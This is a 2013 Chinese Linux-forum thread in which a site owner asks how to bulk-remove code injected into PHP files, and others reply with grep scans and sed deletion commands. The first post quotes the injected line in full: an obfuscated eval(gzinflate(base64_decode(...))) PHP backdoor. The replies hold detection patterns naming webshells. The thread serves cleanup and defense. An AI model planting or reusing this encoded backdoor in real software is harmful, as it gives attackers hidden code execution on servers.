VPS侦探论坛 › Linux交流 › 网站被挂马，求个方法批量删除恶意代码。linux命令。

varien 发表于 2013-1-10 23:54:20

网站被挂马，求个方法批量删除恶意代码。linux命令。

网站被挂马，求个方法批量删除恶意代码。linux命令。1 分钟前

<?php eval(gzinflate(base64_decode('7L0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8i8rqu6t+/zldV3RbLi62dO4e/cfK7FavPfrff//Xpq588ffW9j1+dfvHlm9Pf//jp01cff//wd5vV3ndPvzz56ovTF29+/1dffvmGvqV311n6WepafPvNm5e//1f01+9//Dk1ZAiT888IzPjjux+PF7P7W7Oszbc+Xoxn4+uP73D/FTUBlIFGo7ZY5Ft3tg8+3d/Z4TeK83TrvCjz3z9/VzRts8UQ7tz5PdfLsli+1T+53VbT1quq2fo9uflF3v7+02rZ5ku8hEYjGvyd9LPPPkvPs7LJ7/zi3zj5MfcWjW708XeL5ay6aj6+87t+9hk3+oW/MPj+i9dnp+7Ln/kZ/7tnRZ2fV++Gvv5yldeZ+/IOd/9jq7pYtlsXPyiW5yXIMMma/NP933+WT6sZEeXB851v/z5P3n2nLL5aPN+793vl9x7+Xg+/qn/v/W+/np+cPbk4vX7z+7w9Pf6JB198fvaDPHv94Mnu6tX1F6tfdP2LnlwvfvK7P/WTu4tnb59+8eCn9g4ePrz/4MGDe/fuLS8vL8/zT7+8v/vld+6en9/9wcPpTy1+4snk5eTL1239nWXx+fEvai7OX967f/DtHxwU3/7p8zfrsth9tbf78O7v0y53f+/XD6+/c94+/MGn2fnLN9959fD3bj75RS8vzz9pfnDwyenl4ruTdvZ8f3e9d7FetMtny5+8e3Bx7/zND+79Pi/rT/c/WV//ou82n9S/6OA706snLy4P8ncPX3z6g3f1wcMvrt/dPzg//73v1tVu+e6T2eezn9j/7pvfe3qVzSdnP/3g3WT53d3Z7/373H35ybd/4tsPLn+fu9XxzncWz786PvtiZ1I3+59c/9Rl9upitXr7k/fK53cf3H3z5Pzz58+vdq+vDz755OHDzx+++yr/6Z+++/uc7zy9e+/15dXe1Q/u3jvIp68v7+39XuefTnZ+8Mn9yd1vZ1+e/+D5QbO3/mT/29mDL8/371ffvrv3tLm+9/C6fvPJi/svn+w8ufd5/tOnxy8K+vbhw4NP7uU/cffdYv+rxe/99Ozg3f03s72d4/s/8fDy6eTBxS+6+yA/fX6+/uLk/Af7Vw+++xPTp58/KV8uvqieNsf5l+3Dcka/fHJ695Ofnn2+e3F/cv7J8frzi+XD/fJl/vu8efLywfPXx8/fvN5rH66vfu+7v1f+E9evf6+dk+uLg8WzvcVP/sRP1J/+Pl/Ov/j2Tz559u5teXfxE9UXi4PvvnyYX559enXv5OrqWfPwk/Iy++5P3v3i5Q+ud4rv3l/dfXh8effixXdPnz999t3F5ztf/kSTnb6szvfW2evz6ZOzBxd7PzXbu3/393n+nfk83//Bp6fN8eWD77yrnn/6U5O9k3sPXuz/Pj84v/f0p/cWJ/sH2Rc/df/s3uz69/n09CdOT36vX3R+/vDqbrvMf5/zlz/16t3B7G1RvJq8eHD/XT77ycuf/O5PFE8mk/X9u+u7v+jB/v2fevHyweUPivb+wU/OD3aWywe760/3vnP/izefXv6ig9/7Oy9/r/blLyoXn7TT+hd956cfTtry8vmDd7/3+bc/2X2YV7PTuxf5+YvfJ/+97393ev57f/f3KX/i6sHb5ec/cXD3k+LN9d3nD777g0/2D3baT65fP7x//my6u3N58Ob4+Ondu1effUZKCbrjx36J6Jnf7XxFuun3PK9W+ZJ1RjpKPyahvfOLz1drqBH6fpSSGhl//DMf3zlMz6dl1eT4+M4hgfgl/08AAAD//w==')));?>

一些PHP文件被挂了这样一串代码，在/home/wwwroot目录，求个方法，在linux命令行下批量地删除、替换这些代码。
我试过很多方法，都不行，不知道什么原因。
我用了find、sed等等命令都不行。

licess 发表于 2013-1-11 11:28:39

find /home/wwwroot/* -type f -name "*.php" |xargs grep "eval(" > /tmp/scan1.txt


find /home/wwwroot/* -name "*.php" |xargs egrep "phpspy|c99sh|milw0rm|eval\(gunerpress|eval\(base64_decode|spider_bc"> /tmp/scan2.txt

这样找找试试，然后看/tmp/scan1.txt和/tmp/scan2.txt
把这里面的文件挨个找到，然后打开看看

可以下载下来用绿洲PHP木马扫描助手试试

或用 这个php版的扫描试试

varien 发表于 2013-1-11 13:15:43

回复 2# 的帖子

谢谢军哥，方法很好用，PHP木马扫描助手也很好。

嗯，现在我找出了这些文件，很多，用什么批量替换方法呢？

licess 发表于 2013-1-11 19:20:49

用扫描助手扫描出来的也需要手工打开确认一下

批量处理的可以，如果内容一样，可以用Editplus之类的试试

varien 发表于 2013-1-13 11:15:59

回复 4# 的帖子

军哥，Editplus之类，只有文件在本地才可以批量修改吧？
我不可能把VPS上的文件全部下载下来修改，再上传上去。

如果我在VPS上直接修改可以吗？

varien 发表于 2013-1-13 11:24:09

对了。。。被加的代码内容是完全一样的

licess 发表于 2013-1-13 14:13:27

sed -i "/7L0HYBxJliUmL23Ke39K9UrX4HShCIBg/d" /文件路径/文件名1
sed -i "/7L0HYBxJliUmL23Ke39K9UrX4HShCIBg/d" /文件路径/文件名2

批量执行

查看完整版本: 网站被挂马，求个方法批量删除恶意代码。linux命令。